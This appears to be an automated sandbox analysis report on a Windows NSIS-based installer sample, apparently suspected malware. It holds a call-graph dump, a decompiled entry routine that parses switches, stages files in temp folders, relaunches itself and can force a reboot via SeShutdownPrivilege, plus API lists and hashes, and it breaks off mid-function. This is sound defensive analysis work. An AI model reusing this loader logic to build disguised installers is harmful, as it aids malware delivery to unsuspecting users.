4523->4567 4528 4056bf 4525->4528 4529 4056e0 4525->4529 4530 4056a7 ShowWindow ShowWindow 4525->4530 4526->4525 4590 40544a 5 API calls 4526->4590 4527 405548 4533 40554f GetClientRect GetSystemMetrics SendMessageA SendMessageA 4527->4533 4531 4056c7 4528->4531 4532 40571a 4528->4532 4576 40433b 4529->4576 4572 404309 SendMessageA 4530->4572 4535 4056f3 ShowWindow 4531->4535 4536 4056cf 4531->4536 4532->4529 4542 405727 SendMessageA 4532->4542 4540 4055a1 SendMessageA SendMessageA 4533->4540 4541 4055bd 4533->4541 4538 405713 4535->4538 4539 405705 4535->4539 4573 4042ad 4536->4573 4546 4042ad SendMessageA 4538->4546 4545 405378 24 API calls 4539->4545 4540->4541 4547 4055d0 4541->4547 4548 4055c2 SendMessageA 4541->4548 4544 4056ec 4542->4544 4549 405740 CreatePopupMenu 4542->4549 4545->4538 4546->4532 4568 4042d4 4547->4568 4548->4547 4550 4062ea 17 API calls 4549->4550 4552 405750 AppendMenuA 4550->4552 4554 405781 TrackPopupMenu 4552->4554 4555 40576e GetWindowRect 4552->4555 4553 4055e0 4556 4055e9 ShowWindow 4553->4556 4557 40561d GetDlgItem SendMessageA 4553->4557 4554->4544 4559 40579d 4554->4559 4555->4554 4560 40560c 4556->4560 4561 4055ff ShowWindow 4556->4561 4557->4544 4558 405644 SendMessageA SendMessageA 4557->4558 4558->4544 4562 4057bc SendMessageA 4559->4562 4571 404309 SendMessageA 4560->4571 4561->4560 4562->4562 4563 4057d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4562->4563 4565 4057fb SendMessageA 4563->4565 4565->4565 4566 40581d GlobalUnlock SetClipboardData CloseClipboard 4565->4566 4566->4544 4567->4527 4569 4062ea 17 API calls 4568->4569 4570 4042df SetDlgItemTextA 4569->4570 4570->4553 4571->4557 4572->4528 4574 4042b4 4573->4574 4575 4042ba SendMessageA 4573->4575 4574->4575 4575->4529 4577 4043fe 4576->4577 4578 404353 GetWindowLongA 4576->4578 4577->4544 4578->4577 4579 404368 4578->4579 4579->4577 4580 404395 GetSysColor 4579->4580 4581 404398 4579->4581 4580->4581 4582 4043a8 SetBkMode 4581->4582 4583 40439e 
SetTextColor 4581->4583 4584 4043c0 GetSysColor 4582->4584 4585 4043c6 4582->4585 4583->4582 4584->4585 4586 4043d7 4585->4586 4587 4043cd SetBkColor 4585->4587 4586->4577 4588 4043f1 CreateBrushIndirect 4586->4588 4589 4043ea DeleteObject 4586->4589 4587->4586 4588->4577 4589->4588 5577 404ab7 5578 404ae3 5577->5578 5579 404ac7 5577->5579 5581 404b16 5578->5581 5582 404ae9 SHGetPathFromIDListA 5578->5582 5588 405951 GetDlgItemTextA 5579->5588 5584 404b00 SendMessageA 5582->5584 5585 404af9 5582->5585 5583 404ad4 SendMessageA 5583->5578 5584->5581 5586 40140b 2 API calls 5585->5586 5586->5584 5588->5583 5589 4014b7 5590 4014bd 5589->5590 5591 401389 2 API calls 5590->5591 5592 4014c5 5591->5592 5593 73c3103a 5594 73c31052 5593->5594 5595 73c310c4 5594->5595 5596 73c31080 5594->5596 5597 73c31060 5594->5597 5599 73c31504 GlobalFree 5596->5599 5598 73c31504 GlobalFree 5597->5598 5600 73c31071 5598->5600 5604 73c31078 5599->5604 5601 73c31504 GlobalFree 5600->5601 5601->5604 5602 73c31090 GlobalSize 5603 73c31099 5602->5603 5605 73c310ae 5603->5605 5606 73c3109d GlobalAlloc 5603->5606 5604->5602 5604->5603 5608 73c310b7 GlobalFree 5605->5608 5607 73c31558 3 API calls 5606->5607 5607->5605 5608->5595 4709 4015bb 4710 402c39 17 API calls 4709->4710 4711 4015c2 4710->4711 4712 405c82 4 API calls 4711->4712 4725 4015ca 4712->4725 4713 401624 4715 401652 4713->4715 4716 401629 4713->4716 4714 405c14 CharNextA 4714->4725 4718 401423 24 API calls 4715->4718 4717 401423 24 API calls 4716->4717 4719 401630 4717->4719 4722 40164a 4718->4722 4728 406257 lstrcpynA 4719->4728 4721 4058bb 2 API calls 4721->4725 4723 4058d8 5 API calls 4723->4725 4724 40163b SetCurrentDirectoryA 4724->4722 4725->4713 4725->4714 4725->4721 4725->4723 4726 40160c GetFileAttributesA 4725->4726 4727 40583e 4 API calls 4725->4727 4726->4725 4727->4725 4728->4724 5609 4016bb 5610 402c39 17 API calls 5609->5610 5611 4016c1 GetFullPathNameA 5610->5611 5613 4016d8 5611->5613 5618 4016f9 5611->5618 5612 
40170d GetShortPathNameA 5614 402ac5 5612->5614 5615 4065ce 2 API calls 5613->5615 5613->5618 5616 4016e9 5615->5616 5616->5618 5619 406257 lstrcpynA 5616->5619 5618->5612 5618->5614 5619->5618 5620 40443f 5621 404455 5620->5621 5626 404561 5620->5626 5624 4042d4 18 API calls 5621->5624 5622 4045d0 5623 40469a 5622->5623 5625 4045da GetDlgItem 5622->5625 5631 40433b 8 API calls 5623->5631 5627 4044ab 5624->5627 5628 4045f0 5625->5628 5632 404658 5625->5632 5626->5622 5626->5623 5629 4045a5 GetDlgItem SendMessageA 5626->5629 5630 4042d4 18 API calls 5627->5630 5628->5632 5637 404616 SendMessageA LoadCursorA SetCursor 5628->5637 5653 4042f6 KiUserCallbackDispatcher 5629->5653 5635 4044b8 CheckDlgButton 5630->5635 5636 404695 5631->5636 5632->5623 5633 40466a 5632->5633 5638 404670 SendMessageA 5633->5638 5639 404681 5633->5639 5651 4042f6 KiUserCallbackDispatcher 5635->5651 5654 4046e3 5637->5654 5638->5639 5639->5636 5643 404687 SendMessageA 5639->5643 5640 4045cb 5644 4046bf SendMessageA 5640->5644 5643->5636 5644->5622 5645 4044d6 GetDlgItem 5652 404309 SendMessageA 5645->5652 5648 4044ec SendMessageA 5649 404513 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5648->5649 5650 40450a GetSysColor 5648->5650 5649->5636 5650->5649 5651->5645 5652->5648 5653->5640 5657 405933 ShellExecuteExA 5654->5657 5656 404649 LoadCursorA SetCursor 5656->5632 5657->5656

                                                            Control-flow Graph

                                                            [Control-flow graph of the function starting at 4033b3; legend: Executed / Not Executed]
                                                            C-Code - Quality: 85%
                                                            			_entry_() {
                                                            				CHAR* _v8;
                                                            				long _v12;
                                                            				char _v16;
                                                            				long _v20;
                                                            				void* _v24;
                                                            				int _v28;
                                                            				struct _TOKEN_PRIVILEGES _v40;
                                                            				signed int _v42;
                                                            				long _v44;
                                                            				signed int _v48;
                                                            				char _v163;
                                                            				char _v175;
                                                            				signed short _v182;
                                                            				struct _OSVERSIONINFOA _v196;
                                                            				struct _SHFILEINFOA _v548;
                                                            				intOrPtr* _t87;
                                                            				char* _t93;
                                                            				void* _t95;
                                                            				void* _t99;
                                                            				CHAR* _t101;
                                                            				signed int _t103;
                                                            				int _t106;
                                                            				void* _t107;
                                                            				int _t108;
                                                            				void* _t110;
                                                            				void* _t134;
                                                            				signed int _t150;
                                                            				void* _t153;
                                                            				void* _t158;
                                                            				intOrPtr* _t159;
                                                            				void* _t170;
                                                            				CHAR* _t173;
                                                            				void _t179;
                                                            				void* _t198;
                                                            				void* _t199;
                                                            				signed char* _t213;
                                                            				CHAR* _t217;
                                                            				void* _t223;
                                                            
                                                            				_v20 = 0;
                                                            				_v8 = "Error writing temporary file. Make sure your temp folder is valid.";
                                                            				_v12 = 0;
                                                            				_v16 = 0x20;
                                                            				SetErrorMode(0x8001); // executed
                                                            				_v196.szCSDVersion = 0;
                                                            				_v48 = 0;
                                                            				_v44 = 0;
                                                            				_v196.dwOSVersionInfoSize = 0x9c;
                                                            				if(GetVersionExA( &_v196) != 0) {
                                                            					L3:
                                                            					_t223 = _v196.dwPlatformId - 2;
                                                            					L4:
                                                            					if(_t223 < 0) {
                                                            						_v42 = _v42 & 0x00000000;
                                                            						if(_v175 < 0x41) {
                                                            							_v48 = 0;
                                                            						} else {
                                                            							_v48 = _v175 - 0x40;
                                                            						}
                                                            					}
                                                            					if(_v196.dwMajorVersion < 0xa) {
                                                            						_v182 = _v182 & 0x00000000;
                                                            					}
                                                            					 *0x4524d8 = _v196.dwBuildNumber;
                                                            					 *0x4524dc = (_v196.dwMajorVersion & 0x0000ffff | _v196.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                            					if( *0x4524de != 0x600) {
                                                            						_t159 = E00406663(0);
                                                            						if(_t159 != 0) {
                                                            							 *_t159(0xc00);
                                                            						}
                                                            					}
                                                            					_t217 = "UXTHEME";
                                                            					goto L14;
                                                            					while(1) {
                                                            						L37:
                                                            						_t179 =  *_t95;
                                                            						_t234 = _t179;
                                                            						if(_t179 == 0) {
                                                            							break;
                                                            						}
                                                            						__eflags = _t179 - 0x20;
                                                            						if(_t179 != 0x20) {
                                                            							L23:
                                                            							__eflags =  *_t95 - 0x22;
                                                            							_v16 = 0x20;
                                                            							if( *_t95 == 0x22) {
                                                            								_t95 = _t95 + 1;
                                                            								__eflags = _t95;
                                                            								_v16 = 0x22;
                                                            							}
                                                            							__eflags =  *_t95 - 0x2f;
                                                            							if( *_t95 != 0x2f) {
                                                            								L35:
                                                            								_t95 = E00405C14(_t95, _v16);
                                                            								__eflags =  *_t95 - 0x22;
                                                            								if(__eflags == 0) {
                                                            									_t95 = _t95 + 1;
                                                            									__eflags = _t95;
                                                            								}
                                                            								continue;
                                                            							} else {
                                                            								_t95 = _t95 + 1;
                                                            								__eflags =  *_t95 - 0x53;
                                                            								if( *_t95 != 0x53) {
                                                            									L30:
                                                            									__eflags =  *_t95 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
                                                            									if( *_t95 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
                                                            										L34:
                                                            										__eflags =  *(_t95 - 2) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
                                                            										if( *(_t95 - 2) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
                                                            											 *(_t95 - 2) =  *(_t95 - 2) & 0x00000000;
                                                            											__eflags = _t95 + 2;
                                                            											E00406257("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes", _t95 + 2);
                                                            											L40:
                                                            											GetTempPathA(0x2000, 0x485000); // executed
                                                            											_t99 = E00403382(_t234);
                                                            											_t235 = _t99;
                                                            											if(_t99 != 0) {
                                                            												L43:
                                                            												DeleteFileA(0x483000); // executed
                                                            												_t101 = E00402F0C(_t237, _v12); // executed
                                                            												_v8 = _t101;
                                                            												if(_t101 != 0) {
                                                            													L53:
                                                            													E00403963();
                                                            													__imp__OleUninitialize();
                                                            													_t248 = _v8;
                                                            													if(_v8 == 0) {
                                                            														__eflags =  *0x4524b4;
                                                            														if( *0x4524b4 == 0) {
                                                            															L77:
                                                            															_t103 =  *0x4524cc;
                                                            															__eflags = _t103 - 0xffffffff;
                                                            															if(_t103 != 0xffffffff) {
                                                            																_v20 = _t103;
                                                            															}
                                                            															ExitProcess(_v20);
                                                            														}
                                                            														_t106 = OpenProcessToken(GetCurrentProcess(), 0x28,  &_v24);
                                                            														__eflags = _t106;
                                                            														if(_t106 != 0) {
                                                            															LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v40.Privileges));
                                                            															_v40.PrivilegeCount = 1;
                                                            															_v28 = 2;
                                                            															AdjustTokenPrivileges(_v24, 0,  &_v40, 0, 0, 0);
                                                            														}
                                                            														_t107 = E00406663(4);
                                                            														__eflags = _t107;
                                                            														if(_t107 == 0) {
                                                            															L75:
                                                            															_t108 = ExitWindowsEx(2, 0x80040002);
                                                            															__eflags = _t108;
                                                            															if(_t108 != 0) {
                                                            																goto L77;
                                                            															}
                                                            															goto L76;
                                                            														} else {
                                                            															_t110 =  *_t107(0, 0, 0, 0x25, 0x80040002);
                                                            															__eflags = _t110;
                                                            															if(_t110 == 0) {
                                                            																L76:
                                                            																E0040140B(9);
                                                            																goto L77;
                                                            															}
                                                            															goto L75;
                                                            														}
                                                            													}
                                                            													E0040596D(_v8, 0x200010);
                                                            													ExitProcess(2);
                                                            												}
                                                            												if( *0x45243c == _t101) {
                                                            													L52:
                                                            													 *0x4524cc =  *0x4524cc | 0xffffffff;
                                                            													_v20 = E00403A3D( *0x4524cc);
                                                            													goto L53;
                                                            												}
                                                            												_t213 = E00405C14(0x47b000, _t101);
                                                            												if(_t213 < 0x47b000) {
                                                            													L49:
                                                            													_t244 = _t213 - 0x47b000;
                                                            													_v8 = "Error launching installer";
                                                            													if(_t213 < 0x47b000) {
                                                            														_t173 = E004058D8(_t248);
                                                            														lstrcatA(0x485000, "~nsu");
                                                            														if(_t173 != 0) {
                                                            															lstrcatA(0x485000, "A");
                                                            														}
                                                            														lstrcatA(0x485000, ".tmp");
                                                            														if(lstrcmpiA(0x485000, 0x481000) != 0) {
                                                            															_push(0x485000);
                                                            															if(_t173 == 0) {
                                                            																E004058BB();
                                                            															} else {
                                                            																E0040583E();
                                                            															}
                                                            															SetCurrentDirectoryA(0x485000);
                                                            															if("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes" == 0) {
                                                            																E00406257("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes", 0x481000);
                                                            															}
                                                            															E00406257(0x453000, _v24);
                                                            															_t194 = "A";
                                                            															_v12 = 0x1a;
                                                            															 *0x455000 = "A";
                                                            															do {
                                                            																E004062EA(_t173, 0x432050, 0x485000, 0x432050,  *((intOrPtr*)( *0x452430 + 0x120)));
                                                            																DeleteFileA(0x432050);
                                                            																_t173 = 0;
                                                            																if(_v8 != 0 && CopyFileA(0x489000, 0x432050, 1) != 0) {
                                                            																	E00406030(_t194, 0x432050, 0);
                                                            																	E004062EA(0, 0x432050, 0x485000, 0x432050,  *((intOrPtr*)( *0x452430 + 0x124)));
                                                            																	_t134 = E004058F0(0x432050);
                                                            																	if(_t134 != 0) {
                                                            																		CloseHandle(_t134);
                                                            																		_v8 = 0;
                                                            																	}
                                                            																}
                                                            																 *0x455000 =  *0x455000 + 1;
                                                            																_t62 =  &_v12;
                                                            																 *_t62 = _v12 - 1;
                                                            															} while ( *_t62 != 0);
                                                            															E00406030(_t194, 0x485000, _t173);
                                                            														}
                                                            														goto L53;
                                                            													}
                                                            													 *_t213 =  *_t213 & 0x00000000;
                                                            													_t214 =  &(_t213[4]);
                                                            													if(E00405CD7(_t244,  &(_t213[4])) == 0) {
                                                            														goto L53;
                                                            													}
                                                            													E00406257("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes", _t214);
                                                            													E00406257("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes", _t214);
                                                            													_v8 = _v8 & 0x00000000;
                                                            													goto L52;
                                                            												}
                                                            												_t150 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
                                                            												while( *_t213 != _t150) {
                                                            													_t213 = _t213 - 1;
                                                            													if(_t213 >= 0x47b000) {
                                                            														continue;
                                                            													}
                                                            													goto L49;
                                                            												}
                                                            												goto L49;
                                                            											}
                                                            											GetWindowsDirectoryA(0x485000, 0x1ffb);
                                                            											lstrcatA(0x485000, "\\Temp");
                                                            											_t153 = E00403382(_t235);
                                                            											_t236 = _t153;
                                                            											if(_t153 != 0) {
                                                            												goto L43;
                                                            											}
                                                            											GetTempPathA(0x1ffc, 0x485000);
                                                            											lstrcatA(0x485000, "Low");
                                                            											SetEnvironmentVariableA("TEMP", 0x485000);
                                                            											SetEnvironmentVariableA("TMP", 0x485000);
                                                            											_t158 = E00403382(_t236);
                                                            											_t237 = _t158;
                                                            											if(_t158 == 0) {
                                                            												goto L53;
                                                            											}
                                                            											goto L43;
                                                            										}
                                                            										goto L35;
                                                            									}
                                                            									_t198 =  *((intOrPtr*)(_t95 + 4));
                                                            									__eflags = _t198 - 0x20;
                                                            									if(_t198 == 0x20) {
                                                            										L33:
                                                            										_t42 =  &_v12;
                                                            										 *_t42 = _v12 | 0x00000004;
                                                            										__eflags =  *_t42;
                                                            										goto L34;
                                                            									}
                                                            									__eflags = _t198;
                                                            									if(_t198 != 0) {
                                                            										goto L34;
                                                            									}
                                                            									goto L33;
                                                            								}
                                                            								_t199 =  *(_t95 + 1);
                                                            								__eflags = _t199 - 0x20;
                                                            								if(_t199 == 0x20) {
                                                            									L29:
                                                            									 *0x4524c0 = 1;
                                                            									goto L30;
                                                            								}
                                                            								__eflags = _t199;
                                                            								if(_t199 != 0) {
                                                            									goto L30;
                                                            								}
                                                            								goto L29;
                                                            							}
                                                            						} else {
                                                            							goto L22;
                                                            						}
                                                            						do {
                                                            							L22:
                                                            							_t95 = _t95 + 1;
                                                            							__eflags =  *_t95 - 0x20;
                                                            						} while ( *_t95 == 0x20);
                                                            						goto L23;
                                                            					}
                                                            					goto L40;
                                                            					L14:
                                                            					E004065F5(_t217); // executed
                                                            					_t217 =  &(_t217[lstrlenA(_t217) + 1]);
                                                            					if( *_t217 != 0) {
                                                            						goto L14;
                                                            					} else {
                                                            						E00406663(0xb);
                                                            						 *0x452424 = E00406663(9);
                                                            						_t87 = E00406663(7);
                                                            						if(_t87 != 0) {
                                                            							_t87 =  *_t87(0x1e);
                                                            							if(_t87 != 0) {
                                                            								 *0x4524dc =  *0x4524dc | 0x00000080;
                                                            							}
                                                            						}
                                                            						__imp__#17(_t170);
                                                            						__imp__OleInitialize(0); // executed
                                                            						 *0x4524e0 = _t87;
                                                            						SHGetFileInfoA(0x434050, 0,  &_v548, 0x160, 0); // executed
                                                            						E00406257(0x44e420, "NSIS Error");
                                                            						E00406257(0x47b000, GetCommandLineA());
                                                            						 *0x452420 = 0x400000;
                                                            						_t93 = 0x47b000;
                                                            						if( *0x47b000 == 0x22) {
                                                            							_v16 = 0x22;
                                                            							_t93 = 0x47b001;
                                                            						}
                                                            						_t95 = CharNextA(E00405C14(_t93, _v16));
                                                            						_v24 = _t95;
                                                            						goto L37;
                                                            					}
                                                            				}
                                                            				_v196.dwOSVersionInfoSize = 0x94;
                                                            				GetVersionExA( &_v196);
                                                            				if(_v196.dwPlatformId != 2) {
                                                            					goto L4;
                                                            				} else {
                                                            					_v42 = 4;
                                                            					asm("sbb eax, eax");
                                                            					_v48 =  !( ~(_v196.szCSDVersion - 0x53)) & _v163 - 0x00000030;
                                                            					goto L3;
                                                            				}
                                                            			}










































                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008001), ref: 004033D6
                                                            • GetVersionExA.KERNEL32(?), ref: 004033FF
                                                            • GetVersionExA.KERNEL32(0000009C), ref: 00403416
                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034DF
                                                            • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040351C
                                                            • OleInitialize.OLE32(00000000), ref: 00403523
                                                            • SHGetFileInfoA.SHELL32(00434050,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403541
                                                            • GetCommandLineA.KERNEL32(0044E420,NSIS Error,?,00000007,00000009,0000000B), ref: 00403556
                                                            • CharNextA.USER32(00000000), ref: 00403590
                                                            • GetTempPathA.KERNEL32(00002000,00485000), ref: 00403689
                                                            • GetWindowsDirectoryA.KERNEL32(00485000,00001FFB,?,00000007,00000009,0000000B), ref: 0040369A
                                                            • lstrcatA.KERNEL32(00485000,\Temp,?,00000007,00000009,0000000B), ref: 004036A6
                                                            • GetTempPathA.KERNEL32(00001FFC,00485000), ref: 004036BA
                                                            • lstrcatA.KERNEL32(00485000,Low,?,00000007,00000009,0000000B), ref: 004036C2
                                                            • SetEnvironmentVariableA.KERNEL32(TEMP,00485000,00485000,Low,?,00000007,00000009,0000000B), ref: 004036D3
                                                            • SetEnvironmentVariableA.KERNEL32(TMP,00485000,?,00000007,00000009,0000000B), ref: 004036DB
                                                            • DeleteFileA.KERNELBASE(00483000,?,00000007,00000009,0000000B), ref: 004036EF
                                                            • OleUninitialize.OLE32 ref: 0040379A
                                                            • ExitProcess.KERNEL32 ref: 004037BB
                                                            • lstrcatA.KERNEL32(00485000,~nsu,0047B000,00000000,?,?,00000007,00000009,0000000B), ref: 004037CE
                                                            • lstrcatA.KERNEL32(00485000,0040A14C,00485000,~nsu,0047B000,00000000,?,?,00000007,00000009,0000000B), ref: 004037DD
                                                            • lstrcatA.KERNEL32(00485000,.tmp,00485000,~nsu,0047B000,00000000,?,?,00000007,00000009,0000000B), ref: 004037E8
                                                            • lstrcmpiA.KERNEL32(00485000,00481000,00485000,.tmp,00485000,~nsu,0047B000,00000000,?,?,00000007,00000009,0000000B), ref: 004037F4
                                                            • SetCurrentDirectoryA.KERNEL32(00485000,00485000,?,00000007,00000009,0000000B), ref: 00403810
                                                            • DeleteFileA.KERNEL32(00432050,00432050,?,00453000,?,?,00000007,00000009,0000000B), ref: 0040386D
                                                            • CopyFileA.KERNEL32 ref: 00403882
                                                            • CloseHandle.KERNEL32(00000000), ref: 004038AF
                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038DD
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004038E4
                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038F8
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403917
                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 0040393C
                                                            • ExitProcess.KERNEL32 ref: 0040395D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                            • String ID: "$.tmp$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes$Error launching installer$Low$NSIS Error$P C$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                            • API String ID: 1000954069-3321099877
                                                            • Opcode ID: 5b4a1273ff86c7f48266d57c72b3d881aaa6ca9625edc3239ebafd6de991659e
                                                            • Instruction ID: 35a904cfeb39216351fef3eee688bc31b7ac6ceac067f98900564130ed648918
                                                            • Opcode Fuzzy Hash: 5b4a1273ff86c7f48266d57c72b3d881aaa6ca9625edc3239ebafd6de991659e
                                                            • Instruction Fuzzy Hash: DBE10470904354AADB216F758D49BAF7EB8AF4630AF0440BFE445B62D2C77C4A44CB2E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 93%
                                                            			E73C32288() {
                                                            				CHAR* _t236;
                                                            				void* _t238;
                                                            				signed int _t239;
                                                            				char _t240;
                                                            				char _t241;
                                                            				void _t242;
                                                            				CHAR* _t243;
                                                            				void* _t249;
                                                            				struct HINSTANCE__* _t250;
                                                            				CHAR* _t251;
                                                            				int _t252;
                                                            				CHAR* _t253;
                                                            				signed short _t255;
                                                            				CHAR* _t259;
                                                            				void* _t260;
                                                            				CHAR** _t261;
                                                            				intOrPtr _t264;
                                                            				void* _t272;
                                                            				signed int _t273;
                                                            				CHAR* _t274;
                                                            				CHAR* _t276;
                                                            				CHAR* _t279;
                                                            				void* _t281;
                                                            				CHAR* _t282;
                                                            				void _t283;
                                                            				signed int _t287;
                                                            				void* _t288;
                                                            				void* _t291;
                                                            				CHAR* _t298;
                                                            				signed int _t299;
                                                            				CHAR* _t303;
                                                            				CHAR* _t305;
                                                            				CHAR* _t306;
                                                            				CHAR* _t307;
                                                            				CHAR* _t312;
                                                            				CHAR* _t313;
                                                            				char _t319;
                                                            				CHAR* _t320;
                                                            				char _t323;
                                                            				signed int _t333;
                                                            				void* _t335;
                                                            				CHAR* _t336;
                                                            				CHAR* _t337;
                                                            				void _t338;
                                                            				CHAR* _t341;
                                                            				CHAR* _t343;
                                                            				signed int _t345;
                                                            				signed int _t346;
                                                            				void* _t347;
                                                            				void* _t348;
                                                            				void* _t349;
                                                            				signed int _t355;
                                                            				CHAR* _t360;
                                                            				void* _t361;
                                                            				signed int _t368;
                                                            				signed int _t369;
                                                            				CHAR* _t370;
                                                            				void* _t371;
                                                            				CHAR* _t377;
                                                            				signed int _t379;
                                                            				CHAR* _t380;
                                                            				void* _t382;
                                                            				void* _t383;
                                                            				CHAR* _t384;
                                                            				CHAR* _t385;
                                                            				CHAR* _t386;
                                                            				CHAR* _t387;
                                                            				struct HINSTANCE__* _t388;
                                                            				CHAR* _t390;
                                                            				void* _t391;
                                                            				void* _t392;
                                                            
                                                            				 *(_t392 + 0x1c) = 0;
                                                            				_t382 = 0;
                                                            				 *(_t392 + 0x34) = 0;
                                                            				 *(_t392 + 0x30) = 0;
                                                            				 *(_t392 + 0x18) = 0;
                                                            				 *(_t392 + 0x2c) = 0;
                                                            				 *(_t392 + 0x3c) = 0;
                                                            				 *(_t392 + 0x28) = 0;
                                                            				_t236 = E73C312C6();
                                                            				 *(_t392 + 0x14) = _t236;
                                                            				_t312 = _t236;
                                                            				 *(_t392 + 0x38) = E73C312C6();
                                                            				_t238 = E73C3152B();
                                                            				_t391 = _t238;
                                                            				 *(_t392 + 0x44) = _t238;
                                                            				_t383 = _t238;
                                                            				 *(_t392 + 0x24) = _t391;
                                                            				 *((intOrPtr*)(_t392 + 0x48)) = 2;
                                                            				_t239 = 0;
                                                            				while(1) {
                                                            					_t368 = _t239;
                                                            					 *(_t392 + 0x40) = _t368;
                                                            					if(_t239 != 0 && _t382 == 0) {
                                                            						break;
                                                            					}
                                                            					_t240 =  *_t391;
                                                            					 *((char*)(_t392 + 0x13)) = _t240;
                                                            					_t241 = _t240;
                                                            					_t319 = _t241;
                                                            					if(_t319 == 0) {
                                                            						_t169 = _t392 + 0x1c;
                                                            						 *_t169 =  *(_t392 + 0x1c) | 0xffffffff;
                                                            						__eflags =  *_t169;
                                                            						L132:
                                                            						_t369 = _t368;
                                                            						if(_t369 == 0) {
                                                            							_t370 = 0;
                                                            							 *_t312 = 0;
                                                            							__eflags = _t382;
                                                            							if(_t382 == 0) {
                                                            								_t281 = GlobalAlloc(0x40, 0x14a4); // executed
                                                            								_t382 = _t281;
                                                            								_t370 = 0;
                                                            								__eflags = 0;
                                                            								 *(_t382 + 0x810) = 0;
                                                            								 *(_t382 + 0x814) = 0;
                                                            							}
                                                            							_t242 =  *(_t392 + 0x34);
                                                            							_t177 = _t382 + 8; // 0x8
                                                            							_t320 = _t177;
                                                            							_t178 = _t382 + 0x408; // 0x408
                                                            							_t384 = _t178;
                                                            							 *_t382 = _t242;
                                                            							 *_t320 = _t370;
                                                            							 *_t384 = _t370;
                                                            							 *(_t382 + 0x808) = _t370;
                                                            							 *(_t382 + 0x80c) = _t370;
                                                            							 *(_t382 + 4) = _t370;
                                                            							_t243 = _t242 - _t370;
                                                            							__eflags = _t243;
                                                            							if(_t243 == 0) {
                                                            								__eflags = _t312 -  *(_t392 + 0x14);
                                                            								if(_t312 ==  *(_t392 + 0x14)) {
                                                            									goto L154;
                                                            								}
                                                            								_t390 = _t370;
                                                            								GlobalFree(_t382);
                                                            								_push( *(_t392 + 0x14));
                                                            								_t382 = E73C31326();
                                                            								__eflags = _t382;
                                                            								if(_t382 == 0) {
                                                            									goto L154;
                                                            								} else {
                                                            									goto L147;
                                                            								}
                                                            								while(1) {
                                                            									L147:
                                                            									_t272 =  *(_t382 + 0x14a0);
                                                            									__eflags = _t272;
                                                            									if(_t272 == 0) {
                                                            										break;
                                                            									}
                                                            									_t390 = _t382;
                                                            									_t382 = _t272;
                                                            								}
                                                            								__eflags = _t390;
                                                            								if(_t390 != 0) {
                                                            									_t187 =  &(_t390[0x14a0]);
                                                            									 *_t187 = _t390[0x14a0] & 0x00000000;
                                                            									__eflags =  *_t187;
                                                            								}
                                                            								_t273 =  *(_t382 + 0x810);
                                                            								__eflags = _t273 & 0x00000008;
                                                            								if((_t273 & 0x00000008) == 0) {
                                                            									_t333 = 2;
                                                            									_t274 = _t273 | _t333;
                                                            									__eflags = _t274;
                                                            									 *(_t382 + 0x810) = _t274;
                                                            								} else {
                                                            									_t382 = E73C312D5(_t382);
                                                            									 *(_t382 + 0x810) =  *(_t382 + 0x810) & 0xfffffff5;
                                                            								}
                                                            								goto L154;
                                                            							} else {
                                                            								_t276 = _t243 - 1;
                                                            								__eflags = _t276;
                                                            								if(_t276 == 0) {
                                                            									L143:
                                                            									lstrcpyA(_t320,  *(_t392 + 0x38));
                                                            									L144:
                                                            									lstrcpyA(_t384,  *(_t392 + 0x14));
                                                            									L154:
                                                            									_t312 =  *(_t392 + 0x14);
                                                            									L155:
                                                            									_t239 =  *(_t392 + 0x1c);
                                                            									_t391 = _t391 + 1;
                                                            									 *(_t392 + 0x24) = _t391;
                                                            									_t383 = _t391;
                                                            									if(_t239 != 0xffffffff) {
                                                            										continue;
                                                            									}
                                                            									break;
                                                            								}
                                                            								_t279 = _t276 - 1;
                                                            								__eflags = _t279;
